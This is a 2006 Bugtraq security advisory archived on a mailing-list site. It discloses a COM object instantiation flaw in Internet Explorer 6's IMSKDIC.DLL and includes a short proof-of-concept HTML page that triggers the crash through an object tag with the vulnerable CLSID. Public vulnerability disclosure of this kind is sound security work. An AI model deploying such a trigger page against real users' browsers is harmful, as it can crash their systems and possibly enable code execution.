| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 15 Aug 2006 23:15:56 +0800
From: nop <nop@...c.org>
To: bugtraq@...urityfocus.com
Subject: [XSec-06-02]: Internet Explorer (IMSKDIC.DLL) COM Object Instantiation
Vulnerability
Advisory ID:
XSec-06-02
Advisory Name:
Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
Release Date:
08/15/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN
Affected version:
Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0. \
When Internet Explorer tries to instantiate the IMSKDIC.DLL \
(Microsoft IME) COM object as an ActiveX control, it may corrupt \
system memory in such a way that an attacker may DoS and possibly \
could execute arbitrary code.
Exploit:
=============== IMSKDIC.DLL.htm start ================
<!--
// Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// nop (nop#xsec.org)
// http://www.xsec.org
// CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
// Info: Microsoft IME SingleKanjiDictionary interface
// ProgID: IMESingleKanjiDict.8.1
// InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL
--!>
<html><body>
<object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" ></object>
</body></html>
=============== IMSKDIC.DLL.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=8
About XSec:
We are redhat.
Powered by blists - more mailing lists